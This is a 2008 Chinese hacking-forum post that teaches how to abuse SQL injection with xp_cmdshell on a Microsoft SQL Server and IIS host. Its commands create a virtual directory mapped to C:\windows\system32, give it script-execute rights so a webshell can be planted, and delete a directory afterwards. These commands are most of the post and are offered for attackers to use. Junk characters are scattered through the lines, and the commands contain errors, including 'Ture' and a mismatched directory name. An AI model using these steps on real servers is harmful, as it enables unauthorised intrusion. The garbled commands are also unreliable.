返回列表 发帖
平湖秋月

Rank: 4

帖子
120 
积分
470 
威望
636  
金钱
101  
在线时间
31 小时 

原创奖章帅哥勋章支持奖章论坛元老
1 跳转到 » 倒序看帖
打印
tT
发表于 2008-10-22 14:38 | 显示全部帖子

[原创教程] 如何SQL注入建立虚拟目录

SQL, 目录, 虚拟
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:
4 F% F- z  b  |" M- E+ \! [( M
1 W7 S. A9 S5 X* R* rexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'! K7 s* t# K% G$ x" c4 V
建立虚拟目录win,指向c:\windows\system329 @& R1 X% R  Z8 E
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'  @2 A0 G! g; D$ n  h
让win句有解析asp脚本权限; B/ l% S4 a) n9 q5 z/ ]6 s1 l7 K
$ m* b$ q/ D$ [6 ^
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
& r7 g1 t+ M* \: b2 S删除虚拟目录。/ i) |5 U: [' x  z5 o- a
找不到web绝对路径的一种解决办法,9 b$ F) C$ U- n
4 B, p! n. Z0 X. \
403错误,表示虚拟目录建好了。。
1

评分人数

收藏 分享

返回列表